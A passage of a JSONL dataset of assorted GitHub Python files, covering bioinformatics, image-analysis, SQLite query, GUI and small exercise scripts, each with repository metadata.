random.choices(residues_with_ALT,k=mutations)\n print(residues_to_mutate)\n\n #print([idx for idx in prob[node]])\n for res_idx in prob[node]:\n alt_res = [res for res in prob[node][res_idx]]\n alt_idx = [i for i in range(len(alt_res))]\n n = len(alt_res)\n #if n>1:\n # idx = random.choice(alt_idx)\n # index.append(idx)\n if res_idx in residues_to_mutate:\n index_pool = [i for i in range(n) if i>0]\n idx = random.choice(index_pool)\n print(res_idx,alt_res,alt_idx,idx)\n index.append(idx)\n else:\n index.append(0)\n if not all([i==0 for i in index]):\n index_list.append(index)\n N += 1\n\n nres = len(alternative_residues)\n #print(nres,len(index_list))\n for n in range(numseq):\n seq = [alternative_residues[i][index_list[n][i]] for i in range(nres)]\n #seq = [s for s in seq if s!='-']\n seq = ''.join(seq)\n sequence['%s_Alternative_%d'%(name,n)] = seq\n# print(ni,len(seq),seq)\n seq2fasta(sequence,'SPR_Anc_alternative_%s.fasta'%name)\n","repo_name":"jhpanda/DrosophilaSexPeptide","sub_path":"extract_asr.alt.py","file_name":"extract_asr.alt.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22472824050","text":"import datetime\n\nimport clipboard as clipboard\n\nfrom rivombrosa.marchingegno.comparator import get_tiers\nfrom .config import flags\n\n\nall_tiers = get_tiers()\nresult = f'*{datetime.datetime.now().strftime(\"%A, %d %B %Y, %H:%M\")}*\\n\\n'\nfor league, tiers in all_tiers.items():\n if any([len(tiers['tier_1']), len(tiers['tier_2']), len(tiers['tier_3'])]):\n result += f'{flags[league]} _{league}_\\n'\n\n for t in ('tier_1', 'tier_2', 'tier_3'):\n result += f'*{t.replace(\"_\", \" \").title()}:*\\n'\n if len(tiers[t]):\n for info in tiers[t]:\n result += f'{info[\"match\"]} *{info[\"outcome\"]}* / {info[\"odds\"]} *({info[\"coeff\"]}%)* > € {info[\"stake\"] or 1}\\n'\n else:\n result += f'_Nessun match nel {t.replace(\"_\", \" \").title()}_\\n'\n result += '\\n'\n\nprint(result)\nclipboard.copy(result)\n","repo_name":"princewav/RivombrosaWeb","sub_path":"rivombrosa/tiers_formatter.py","file_name":"tiers_formatter.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42063746989","text":"# -*- coding: utf-8 -*-\n\nimport requests\nfrom time import sleep\n\ndef urlreq():\n resp = requests.get(\"http://localhost:5000/warState\")\n return resp.text\n\ndef visualizeState(state_json):\n print(state_json)\n\nif __name__ == \"__main__\":\n while True:\n state = urlreq()\n visualizeState(state)\n sleep(1)\n\n","repo_name":"OneNightROBOCON/burger_war","sub_path":"judge/visualizeConsole.py","file_name":"visualizeConsole.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"69"}
+{"seq_id":"29171475377","text":"import wx, sys\nfrom EClassWindow import EClassWindow\nsys.path.insert(0, 'model')\nfrom EClass import EClass\n \nclass JoinPresentation(wx.Frame):\n \n def __init__(self, parent):\n wx.Frame.__init__(self, None, wx.ID_ANY)\n self.SetLabel('Select a Presentation to Join')\n\n panel = wx.Panel(self, wx.ID_ANY)\n self.index = 0\n self.parent = parent\n\n self.list_ctrl = wx.ListCtrl(panel, size=(-1,100),\n style=wx.LC_REPORT\n |wx.BORDER_SUNKEN\n )\n self.list_ctrl.InsertColumn(0, 'Class')\n self.list_ctrl.InsertColumn(1, 'Last')\n self.list_ctrl.InsertColumn(2, 'First')\n self.list_ctrl.InsertColumn(3, 'Hosted')\n\n self.reasonText = wx.StaticText(panel, -1)\n self.reasonText.SetForegroundColour((255, 0, 0))\n\n btn = wx.Button(panel, label=\"Join\")\n btn.Bind(wx.EVT_BUTTON, self.join)\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(self.reasonText, 0, wx.ALL|wx.EXPAND, 5)\n sizer.Add(self.list_ctrl, 0, wx.ALL|wx.EXPAND, 5)\n sizer.Add(btn, 0, wx.ALL|wx.CENTER, 5)\n panel.SetSizer(sizer)\n self.Bind(wx.EVT_CLOSE, self.onClose)\n\n self.setClasses(EClass.GetInstance().classes)\n EClass.GetInstance().connection.registerStudentClassesListener(self.setClasses)\n\n def setClasses(self, classes):\n self.list_ctrl.DeleteAllItems()\n for c in classes:\n self.list_ctrl.Append((c['name'], c['lastname'], c['firstname'],\n 'true' if c['hosted'] else '')\n )\n\n def onClose(self, event):\n EClass.GetInstance().exit()\n\n def join(self, event):\n selected = EClass.GetInstance().classes[self.list_ctrl.GetFocusedItem()]\n\n EClass.GetInstance().connection.joinPresentation(selected['name'],\n selected['lastname'], selected['firstname'],\n self.callback\n )\n\n def callback(self, response):\n if response.success:\n window = EClassWindow()\n EClass.GetInstance().loadInitialData(response.data)\n window.showPresentation()\n self.Hide()\n else:\n self.reasonText.SetLabel(response.reason)\n \n","repo_name":"joshterrell805-historic/EClass","sub_path":"implementation/source/python/view/JoinPresentation.py","file_name":"JoinPresentation.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"29097688680","text":"\"\"\"\nRequests for pushing events to Slack\n\n\"\"\"\n\n\nclass SlackClient:\n\n headers = {\"Content-Type\": \"application/json\"}\n\n def __init__(self, session, url):\n self.session = session\n self.url = url\n\n async def slack_post(self, body):\n async with self.session.post(\n headers=self.headers, url=self.url, data=body\n ) as response:\n if response.status == 200:\n return\n else:\n print(response)","repo_name":"team-telnyx/demo-python-telnyx","sub_path":"call-center-texml/call_center/infrastructure/client/http/slackrequests.py","file_name":"slackrequests.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"69"}
+{"seq_id":"19990642640","text":"import openai\nimport os\nimport json\n\n\nopenai.api_key = input('Enter ChatGPT API Key')\n\ndef add_json(data):\n with open(\"log.json\", mode=\"r\") as file:\n messeges = json.load(file)\n messeges.append(data)\n with open(\"log.json\", mode=\"w\") as file:\n json.dump(messeges, file)\n\ndef chatgpt_response(prompt):\n add_json({\"role\": \"user\", \"content\": prompt})\n with open(\"log.json\", mode=\"r\") as file:\n json_messeges = json.load(file)\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=json_messeges,\n temperature=0.5,\n max_tokens=100\n )\n prompt_response = response['choices'][0]['message']['content']\n add_json(response['choices'][0]['message'])\n return prompt_response\n","repo_name":"ArtemChirakhov/GPTodd","sub_path":"chatgpt.py","file_name":"chatgpt.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34189312611","text":"\n\n\"\"\"\n 13.1 Word frequency analysis\n\"\"\"\n\n\nimport os \nimport string\n\ndef cleanFile(fname):\n\tfin = open(fname)\n\n\tres = []\n\n\tfor line in fin:\n\t\twords = line.split()\n\t\tfor word in words:\n\t\t\ts = word.translate(string.maketrans(\"\", \"\"), string.punctuation + string.digits)\n\t\tres.append(s.strip().lower())\n\n\treturn res \n\n#print len(cleanFile('../words.txt'))\n#print cleanFile('../words.txt')[:100]\n\n\ndef processLine(line):\n\n\twords = line.split()\n\tres = []\n\n\tfor word in words:\n\t\ts = word.translate(string.maketrans(\"\", \"\"), string.punctuation+string.digits)\n\t\tres.append(s.strip().lower())\n\n\treturn res \n\ndef processFile(fname, processLine):\n\n\td = dict()\n\twith open(fname) as fin:\n\t\tfor line in fin:\n\t\t\tlst = processLine(line)\n\t\t\tfor word in lst:\n\t\t\t\td[word] = d.get(word, 0) + 1\n\n\treturn d \n\n\n\n\n\n","repo_name":"April-Xue/thinking_python","sub_path":"ch13.py","file_name":"ch13.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"856820588","text":"\"\"\"Save TissueNet as individulal TIFF files.\n\nThese files are then fed into cellpose for training.\n\nTo train the cellpose model:\n\nCUDA_VISIBLE_DEVICES=3 python -m cellpose --train \\\n--dir /deepcell_data/users/willgraf/mesmer_retrain/tissue_net/seed1/train/ \\\n--test_dir /deepcell_data/users/willgraf/mesmer_retrain/tissue_net/seed1/val/ \\\n--pretrained_model None \\\n--img_filter _img \\\n--mask_filter _masks \\\n--chan 2 --chan2 1 \\\n--use_gpu\n\nTo run the newly trained cellpose model:\n\nCUDA_VISIBLE_DEVICES=3 python -m cellpose \\\n--dir /deepcell_data/users/willgraf/mesmer_retrain/tissue_net/seed1/test_run/ \\\n--pretrained_model /deepcell_data/users/willgraf/mesmer_retrain/tissue_net/seed1/train/models/cellpose_residual_on_style_on_concatenation_off_train_2021_04_26_11_35_14.114698 \\\n--chan 2 --chan2 1 \\\n--diameter 23. --save_tif --use_gpu\n\n\nTo run the pretrained version of the CellPose model:\n\npython -m cellpose\n --dir /deepcell_data/users/willgraf/cellpose/test_split_1_channels_first\n --pretrained_model cyto\n --chan 0 --chan2 1\n --diameter 0.\n --save_tif --use_gpu\n\"\"\"\n\nimport os\nimport numpy as np\nimport tifffile\n\nSEED = 1\n\nNPZ_NAME = '20201018_multiplex_seed_{}'.format(SEED)\nEXP_NAME = '20200824_hyper_parameter'\nMODEL_NAME = '{}_cellpose'.format(NPZ_NAME)\n\nROOT_DIR = '/deepcell_data'\nLOG_DIR = os.path.join(ROOT_DIR, 'logs')\nMODEL_DIR = os.path.join(ROOT_DIR, 'models', EXP_NAME)\n\nDATA_DIR = os.path.join(ROOT_DIR, 'users/willgraf/mesmer_retrain')\nTIFF_PATH = os.path.join(DATA_DIR, 'tissue_net/seed{}'.format(SEED))\n\nTRAIN_DATA_FILE = os.path.join(DATA_DIR, '{}_train_512x512.npz'.format(NPZ_NAME))\nVAL_DATA_FILE = os.path.join(DATA_DIR, '{}_val_256x256.npz'.format(NPZ_NAME))\nTEST_DATA_FILE = os.path.join(DATA_DIR, '{}_test_256x256.npz'.format(NPZ_NAME))\n\nTEST_PRED_DATA_FILE = os.path.join(DATA_DIR, '{}_test_pred.npz'.format(NPZ_NAME))\n\n\ndef save_as_tiffs(npz_path, tiff_dir):\n data = np.load(npz_path, allow_pickle=True)\n X = data['X']\n y = data['y']\n\n assert X.shape[0] == y.shape[0], 'X and y should have the same number of images.'\n\n for i in range(X.shape[0]):\n img_filename = '{:04d}_img.tif'.format(i)\n mask_filename = '{:04d}_masks.tif'.format(i)\n\n tifffile.imsave(os.path.join(tiff_dir, img_filename), X[i])\n tifffile.imsave(os.path.join(tiff_dir, mask_filename), y[i])\n print('saved %s files to %s' % (len(X), tiff_dir))\n\n\nif __name__ == '__main__':\n data_files = [\n ('train', TRAIN_DATA_FILE),\n ('val', VAL_DATA_FILE),\n ('test', TEST_DATA_FILE),\n ]\n for prefix, data_file in data_files:\n f = os.path.join(DATA_DIR, data_file)\n subdir = os.path.join(TIFF_PATH, prefix)\n if not os.path.isdir(subdir):\n os.makedirs(subdir)\n save_as_tiffs(f, subdir)\n\n X_train = train_data['X']\n y_train = train_data['y']\n\n X_val = val_data['X']\n y_val = val_data['y']\n\n X_test = test_data['X']\n y_test = test_data['y']\n","repo_name":"vanvalenlab/publication-figures","sub_path":"2021-Greenwald_Miller_et_al-Mesmer/notebooks/training/Cellpose_training.py","file_name":"Cellpose_training.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"69"}
+{"seq_id":"16923359305","text":"from BristolMatchingEngine import *\nfrom time import time\n\ntvec = TraderVector()\n\nfor i in range(100_000):\n tvec.append(Trader(True, False))\n \nfor i in range(100_000):\n tvec.append(Trader(False, True))\n\nx = LimitOrderBook()\n\nt0 = time()\n\nx.run_experiment(0, 1000, tvec)\n\nprint(time() - t0)\n\nprint(len(x.get_executed_transactions()))\n","repo_name":"gabedonnan/CPPLob","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"29079953629","text":"from ctypes import sizeof\nfrom operator import length_hint\nfrom PIL import Image\nimport PIL\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nskaidinysSize = 10\n\nprint(\"Iveskite 2 nuotraukų lokacijas\")\npath1 = input()\npath2 = input()\nim = Image.open(path1, 'r')\nwidth, height = im.size\npixel_values = list(im.getdata())\n\nim2 = Image.open(path2, 'r')\nwidth2, height2 = im2.size\npixel_values2 = list(im2.getdata())\n\n\ndef getBrightness(pixelValues):\n brightnessArray = []\n\n for x in pixelValues:\n rgbSum = x[0] + x[1] + x[2]\n brightness = rgbSum / 3\n brightnessArray.append(brightness)\n return brightnessArray\n\n\nbrightnessArray = getBrightness(pixel_values)\nbrightnessArray2 = getBrightness(pixel_values2)\n\n\ndef current_milli_time():\n return round(time.time() * 1000)\n\n\ndef showImage(array):\n image_array = np.array(array, dtype=np.uint8)\n img = PIL.Image.fromarray(image_array)\n\n current_time = str(current_milli_time())\n\n img.save(current_time+'.jpg')\n\n\ndef prepareForViewing(brightnessArray):\n l = []\n temp = []\n tempLine = []\n\n h = 0\n while h < height:\n w = 0\n tempLine = []\n while w < width:\n index = h * width + w\n value = round(brightnessArray[index])\n temp = [value, value, value]\n tempLine.append(temp)\n w += 1\n h += 1\n l.append(tempLine)\n\n showImage(l)\n\n\nprepareForViewing(brightnessArray)\nprepareForViewing(brightnessArray2)\n\n\ndef getSkaidinys(brightnessArray):\n l2 = []\n temp2 = []\n tempLine2 = []\n\n h = 0\n while h < height:\n w = 0\n tempLine2 = []\n while w < width:\n index = h * width + w\n\n count = 0\n sum = 0\n\n for i in range(0, skaidinysSize):\n for j in range(0, skaidinysSize):\n count += 1\n sum += brightnessArray[index+j+(width*i)]\n\n rounded =int(sum/count)\n\n temp2 = [rounded, rounded, rounded]\n tempLine2.append(temp2)\n w += skaidinysSize\n h += skaidinysSize\n l2.append(tempLine2)\n\n showImage(l2)\n return l2\n\n\nskaidinys = getSkaidinys(brightnessArray)\nskaidinys2 = getSkaidinys(brightnessArray2)\n\n\ndef findMax(array1, array2):\n maxDiff = 0\n maxDiffX = 0\n\n i = 0\n while i < len(array1):\n if (abs(array1[i]-array2[i]) > maxDiff):\n maxDiff = abs(array1[i]-array2[i])\n maxDiffX = i\n i += 1\n print(\"Maksimalus atsilenkimas tarp funkcijų reikšmių: \", maxDiff)\n if (maxDiffX == 0):\n x = 0\n y = 0\n else:\n x = maxDiffX % (width/skaidinysSize)\n y = maxDiffX//(width/skaidinysSize)\n\n print(\"X: \", x)\n print(\"Y: \", y)\n\n\ndef drawGraph(doubleArray, doubleArray2):\n x = list(range(1, len(doubleArray) * len(doubleArray[0])+1))\n y = []\n for w in doubleArray:\n for h in w:\n y.append(h[0])\n\n # plotting the points\n plt.plot(x, y, label=\"Pirma nuotrauka\")\n # plt.scatter(x, y, label= \"first\", color= \"green\",\n # marker= \".\", s=1)\n\n # line 2 points\n x2 = x\n y2 = []\n\n for w in doubleArray2:\n for h in w:\n y2.append(h[0])\n\n # plotting the line 2 points\n plt.plot(x2, y2, label=\"Antra nuotrauka\")\n # plt.scatter(x2, y2, label= \"second\", color= \"blue\",\n # marker= \".\", s=1)\n\n # naming the x axis\n plt.xlabel('x - skaidiniai')\n # naming the y axis\n plt.ylabel('y - ryškumas')\n # giving a title to my graph\n plt.title('Nuotraukų palyginimo grafikas')\n\n # show a legend on the plot\n plt.legend()\n\n # function to show the plot\n plt.show()\n\n findMax(y, y2)\n\n\n# pip install matplotlib\ndrawGraph(skaidinys, 
skaidinys2)\n","repo_name":"KerniusB/matanas","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35636645654","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport glob\nimport time\nimport argparse\nimport yaml\nimport json\nimport subprocess\n\n\n# configuration to be used when no config file exists in the batch dir\nDEFAULT_CONFIG = {\n 'max_parallel_runs': 3,\n 'resume_failed_run': False,\n 'nextflow_config': '/home/ubuntu/testing/argo-alignment-test-run/nextflow.config',\n 'workflow_version': '1.5.5',\n 'profile': 'slurm_docker',\n 'reverse_order': False,\n 'remove_input_bam': False\n}\n\n\ndef get_config(batch_dir):\n # name of the config file: settings.conf, file format: YAML\n conf_file = os.path.join(batch_dir, 'settings.conf')\n\n if os.path.isfile(conf_file):\n with open(os.path.join(batch_dir, 'settings.conf')) as f:\n config = yaml.safe_load(f)\n else:\n config = DEFAULT_CONFIG\n\n return config\n\n\ndef cleanup(job_dir, config):\n if config.get('remove_input_bam'):\n job_file = os.path.join(job_dir, '%s.nf-job.json' % os.path.basename(job_dir))\n with open(job_file, 'r') as j:\n job = json.load(j)\n for bam in job['sequencing_files']:\n if os.path.exists(os.path.realpath(os.path.join(job_dir, bam))):\n print(\"remove input bam: %s\" % os.path.realpath(os.path.join(job_dir, bam)))\n os.remove(os.path.realpath(os.path.join(job_dir, bam)))\n\n\ndef get_job_summary(batch_dir, config=DEFAULT_CONFIG):\n # go through the job dirs\n job_summary = {\n 'new': [],\n 'completed': [],\n 'running': [],\n 'failed': []\n }\n\n job_dirs = sorted(glob.glob(os.path.join(batch_dir, '*')))\n if config.get('reverse_order'):\n job_dirs = sorted(job_dirs, reverse=True)\n\n for job_dir in job_dirs:\n if not os.path.isdir(job_dir): # skip if not dir\n continue\n\n job_file = os.path.join(job_dir, '%s.nf-job.json' % os.path.basename(job_dir))\n if not os.path.isfile(job_file): # skip if no job json\n continue\n\n trace_file = os.path.join(job_dir, 'trace.txt')\n stdout_file = os.path.join(job_dir, 'stdout')\n # the logic below for different job status can be improved\n if os.path.isfile(stdout_file):\n # if 'stdout' exists but 'trace.txt' does not, the job has already been launched\n # it's in running state, but just not scheduled by slurm or have not got the time\n # to generate the 'trace.txt' file\n if not os.path.isfile(trace_file):\n job_summary['running'].append({\n 'job_dir': job_dir\n })\n\n else: # now both trace.txt and stdout exist\n trace_lines = []\n with open(trace_file, 'r') as f:\n trace_lines = f.read().split('\\n')\n trace_lines = trace_lines[:-1] # remove the last line which is empty \n\n stdout_lines = []\n with open(stdout_file, 'r') as f:\n stdout_lines = f.read().split('\\n')\n\n completed_in_stdout = False\n for stdout_line in reversed(stdout_lines): # loop backwards\n if 'process > DnaAln:cleanup' in stdout_line and '[100%] 1 of 1' in stdout_line:\n completed_in_stdout = True\n\n # we are conservative to call a run is completed, so require confirmation\n # from both trace and stdout\n if 'DnaAln:cleanup' == trace_lines[-1].split('\\t')[3] and \\\n 'COMPLETED' == trace_lines[-1].split('\\t')[4] and \\\n completed_in_stdout:\n job_summary['completed'].append({\n 'job_dir': job_dir\n })\n\n # cleanup the input BAM to free more space\n cleanup(job_dir, config)\n\n else: # now either running or failed\n status = 'running' # assume running\n for trace_line in trace_lines:\n if trace_line.startswith('task_id'):\n continue\n\n cols = trace_line.split('\\t')\n if cols[4] == 'FAILED' or cols[4] == 'ABORTED': # treat the two same way\n status = 'failed'\n 
break\n\n job_summary[status].append({\n 'job_dir': job_dir\n })\n\n else: # no stdout file, it's new job\n job_summary['new'].append({\n 'job_dir': job_dir\n })\n\n return job_summary\n\n\ndef launch_job(job, config=DEFAULT_CONFIG, resume=False, launch=False):\n job_dir = job['job_dir']\n job_file = os.path.join(job_dir, '%s.nf-job.json' % os.path.basename(job_dir))\n if not os.path.isfile(job_file):\n raise Exception('Nextflow job JSON file not found under: %s' % job_dir)\n\n launch_command = 'cd %s && nextflow -C %s run icgc-argo/dna-seq-processing-wfs -r %s -params-file %s ' % \\\n (job_dir, config['nextflow_config'], config['workflow_version'], os.path.basename(job_file)) + \\\n '-profile %s -queue-size %s ' % (config['profile'], \"2\") + \\\n '-with-report -with-trace %s' % ('-resume ' if resume else '')\n\n launch_command += '2> stderr > stdout'\n\n if launch:\n time.sleep(8) # sleep 8 seconds to avoid launching runs too close to each other\n system_call = subprocess.Popen(launch_command, shell=True)\n print('Launched run: %s' % job_file, file=sys.stderr)\n else:\n print('Launch flag (-l) not set. Otherwise, would have launched a run with command: %s' % launch_command, file=sys.stderr)\n\n\ndef main(batch_dir=None, launch=False):\n config = get_config(batch_dir)\n\n job_summary = get_job_summary(batch_dir, config=config)\n # print(json.dumps(job_summary))\n print(\"Job status, new: %s, running: %s, completed: %s, failed: %s\" % (\n len(job_summary['new']), len(job_summary['running']), len(job_summary['completed']), len(job_summary['failed'])\n ))\n\n available_run_slots = config['max_parallel_runs'] - len(job_summary['running'])\n\n if available_run_slots > 0:\n if config['resume_failed_run']: # resume failed jobs first if resume set to true\n for job in job_summary['failed']:\n launch_job(job, config, resume=True, launch=launch)\n available_run_slots -= 1\n\n if available_run_slots == 0:\n break\n\n # still have run slots, then launch new jobs\n if available_run_slots > 0:\n for job in job_summary['new']:\n launch_job(job, config, resume=False, launch=launch)\n available_run_slots -= 1\n\n if available_run_slots == 0:\n break\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Nextflow run monitor and launcher')\n parser.add_argument('-d', dest='batch_dir', required=True, help='A directory containing all job folders in one batch')\n parser.add_argument('-l', dest='launch', action='store_true', help='Flag for actual launch, otherwise informational only')\n args = parser.parse_args()\n\n main(batch_dir=args.batch_dir, launch=args.launch)\n\n","repo_name":"icgc-argo-workflows/metadata-for-benchmarking-datasets","sub_path":"scripts/nf-launcher.py","file_name":"nf-launcher.py","file_ext":"py","file_size_in_byte":7318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"20867811340","text":"import csv\nimport sqlite3\ndBase = \"database.db\"\nconn = sqlite3.connect(\"database.db\")\n'''\nresult1 = conn.execute(\n \"SELECT mov.Budget, mov.Nconst, history.Nconst, mov.User_Rating, mov.Tconst, history.Tconst, history.User_Rating from (SELECT M.User_Rating, H.Nconst, M.Tconst, M.Budget FROM MOVIE as M, DIRECTED_BY as H WHERE M.Tconst = H.Tconst and H.Nconst NOT LIKE \\\"\\\\N\\\") as mov JOIN (SELECT H.Nconst, M.Tconst, M.User_Rating FROM MOVIE as M, DIRECTED_BY as H WHERE M.Tconst = H.Tconst and H.Nconst NOT LIKE \\\"\\\\N\\\") as history on history.Nconst = mov.Nconst WHERE move.Budget IS NOT NULL ORDER BY mov.Nconst;\")\n\nwith open('question1.csv', 'w') as csvfile:\n write = csv.writer(csvfile, delimiter = ' ', quotechar = '|', quoting = csv.QUOTE_MINIMAL)\n for i in result1.fetchall():\n i = list(i)\n print(i)\n write.writerow(i)\n\nresult2 = conn.execute(\"SELECT M.Act_1_Likes, M.Act_2_Likes, M.Act_3_Likes, M.Face_number, M.Revenue FROM MOVIE as M WHERE Act_3_Likes and Act_2_Likes and Act_1_Likes and Revenue and Face_number is not null;\")\n\nwith open('question2.csv', 'w') as csvfile:\n write = csv.writer(csvfile, delimiter = ' ', quotechar = '|', quoting = csv.QUOTE_MINIMAL)\n for i in result2.fetchall():\n i = list(i)\n print(i)\n write.writerow(i)\n\nresult3 = conn.execute(\"SELECT M.User_Rating, M.Critic_Rating, M.Revenue FROM MOVIE as M WHERE User_Rating and Critic_Rating and Revenue is not null;\")\n\nwith open('question3.csv', 'w') as csvfile:\n write = csv.writer(csvfile, delimiter = ' ', quotechar = '|', quoting = csv.QUOTE_MINIMAL)\n for i in result3.fetchall():\n i = list(i)\n print(i)\n write.writerow(i)\n'''\nresult4 = conn.execute(\"SELECT M.Act_1_Likes, M.Act_2_Likes, M.Act_3_Likes, M.Director_Likes, M.Revenue, M.Budget FROM MOVIE as M WHERE Revenue and Act_1_Likes and Act_2_Likes and Act_3_Likes is NOT NULL ;\")\nwith open('question4.csv', 'w') as csvfile:\n write = csv.writer(csvfile, delimiter = ' ', quotechar = '|', quoting = csv.QUOTE_MINIMAL)\n for i in result4.fetchall():\n i = list(i)\n print(i)\n write.writerow(i)\n\nresult5 = conn.execute(\"SELECT epi.Rating, sea.SeasonR, epi.Econst, sea.Tconst from( SELECT E.Econst, S.Tconst as SeasonT, R.Avg_Rating as Rating FROM EPISODE as E, SEASON as S, HAS_EPISODE as H, RATINGS as R WHERE E.Econst = H.Econst and S.Tconst = H.Season_Tconst and E.Econst = R.Tconst ) as epi JOIN ( SELECT S.Tconst, R.Avg_Rating as SeasonR FROM SEASON as S, RATINGS as R WHERE S.Tconst = R.Tconst ) as sea on epi.SeasonT = sea.Tconst ORDER BY sea.Tconst;\")\n\nwith open('question5.csv', 'w') as csvfile:\n write = csv.writer(csvfile, delimiter = ' ', quotechar = '|', quoting = csv.QUOTE_MINIMAL)\n for i in result5.fetchall():\n i = list(i)\n print(i)\n write.writerow(i)\n\nconn.close()","repo_name":"ballcarsen/Database-science-Project","sub_path":"ProjectCode/Query.py","file_name":"Query.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8336941246","text":"from cmd import Cmd\r\nimport os\r\nimport sys\r\nfrom class_kernel import *\r\n\r\nclass CommandParser:\r\n def __init__(self, class_style):\r\n print(class_style.green(\"[OK] \") + class_style.yellow(\"Command Parser Loaded\"))\r\n\r\n def parse(self, command):\r\n return command\r\n\r\n\r\nclass CommandLine(Cmd):\r\n def __init__(self,class_style,kernel):\r\n Cmd.__init__(self)\r\n self.doc_header = \"Documented commands (type help ):\"\r\n self.misc_header = \"Miscellaneous help topics:\"\r\n self.undoc_header = \"Undocumented commands:\"\r\n self.__Style=class_style\r\n self.__Kernel=kernel\r\n self.prompt = self.__Kernel.get_name() + \"@\" + self.__Kernel.get_env() + \"~# \"\r\n self.__Kernel.set_name(\"HELLO\")\r\n\r\n def do_change(self, line):\r\n print(\"HE\")\r\n def do_help(self, arg):\r\n 'List available commands with \"help\" or detailed help with \"help cmd\".'\r\n if arg:\r\n # XXX check arg syntax\r\n try:\r\n func = getattr(self, 'help_' + arg)\r\n except AttributeError:\r\n try:\r\n doc=getattr(self, 'do_' + arg).__doc__\r\n if doc:\r\n self.stdout.write(\"%s\\n\"%str(doc))\r\n return\r\n except AttributeError:\r\n pass\r\n self.stdout.write(\"%s\\n\"%str(self.nohelp % (arg,)))\r\n return\r\n func()\r\n else:\r\n names = self.get_names()\r\n cmds_doc = []\r\n cmds_undoc = []\r\n help = {}\r\n for name in names:\r\n if name[:5] == 'help_':\r\n help[name[5:]]=1\r\n names.sort()\r\n # There can be duplicates if routines overridden\r\n prevname = ''\r\n for name in names:\r\n if name[:3] == 'do_':\r\n if name == prevname:\r\n continue\r\n prevname = name\r\n cmd=name[3:]\r\n if cmd in help:\r\n cmds_doc.append(cmd)\r\n del help[cmd]\r\n elif getattr(self, name).__doc__:\r\n cmds_doc.append(cmd)\r\n else:\r\n cmds_undoc.append(cmd)\r\n self.stdout.write(\"%s\\n\"%str(self.doc_leader))\r\n self.print_topics(self.__Style.red(self.doc_header), cmds_doc, 15,80)\r\n self.print_topics(self.misc_header, help.keys(),15,80)\r\n self.print_topics(self.undoc_header, cmds_undoc, 15,80)","repo_name":"xingboyu1/Xtoolkit","sub_path":"class_command_line.py","file_name":"class_command_line.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14366242624","text":"\nfrom rtiCUDA import rcarray\nfrom rtiCUDA import messageSender\nimport numpy as np\nimport time\nimport math\n\nk=3\n\nif __name__=='__main__':\n messageSender.connect(\"andrej\")\n start = time.perf_counter()\n ars1 = []\n ars2 = []\n for i in range(k):\n ar1 = rcarray.makeRcArray(\"int\",[k],1)\n ars1.append(ar1)\n ar2 = rcarray.makeRcArray(\"int\",[k],1)\n ars2.append(ar2)\n ar3 = rcarray.makeMatrix(\"int\",ars1,k)\n ar6 = rcarray.makeMatrix(\"int\",ars2,k)\n #print(ar3)\n #print(ar6)\n start = time.perf_counter()\n ar7 = rcarray.dot(ar3,ar6)\n p = rcarray.sum(ar7)\n end = time.perf_counter()\n print(p)\n print(end-start)\n\n np1 = np.ones((k,k))\n np2 = np.ones((k,k))\n #print(ar7)\n start = time.perf_counter()\n\n np3 = np.matmul(np1, np2)\n s=np.sum(np3)\n end = time.perf_counter()\n print(s)\n print(end-start)\n\n messageSender.disconnect()","repo_name":"andrejjakovljevic/Bachelor-s","sub_path":"rtiCUDA/tests/help_test.py","file_name":"help_test.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"37027184726","text":"import random\nclass Product:\n \n def __init__(self, c, n, s, p, m, e, ):\n self.code=int(c)\n self.name=str(n)\n self.stock=int(s)\n self.price=int(p)\n self.manufac=int(m)\n self.emu=int(e)\n \n\n def display(self):\n print(\"******Programing Principles Sample Stock Statement*****\")\n print(\"Product Code: \", self.code)\n print(\"Product Name: \", self.name)\n print(\"Sale Price: \", self.price)\n print(\"Manufacture Cost: \", self.manufac)\n print(\"Monthly Production: \", self.emu, \"(Approx.)\")\n\n #def months(self):\n \n #intr = random.randint(-10,10)\n \n #print(\"Month 1: \")\n #print(\"- Manufactured: \", self.emu)\n #print(\"- Sold: \", self.emu + )\n #print(\"- Stock: \", self.emu + )\n \n\nprint(\"Welcome to Programming Principles Sample Product Inventory\")\nprod_instance = Product(input(\"Please enter the Product Code: \"), input(\"Please enter the Product Name: \"), \n input(\"Please enter the Current Stock: \"), input(\"Please enter the Product Sale Price: \"),\n input(\"Please enter the Product Manufacture Cost: \"), 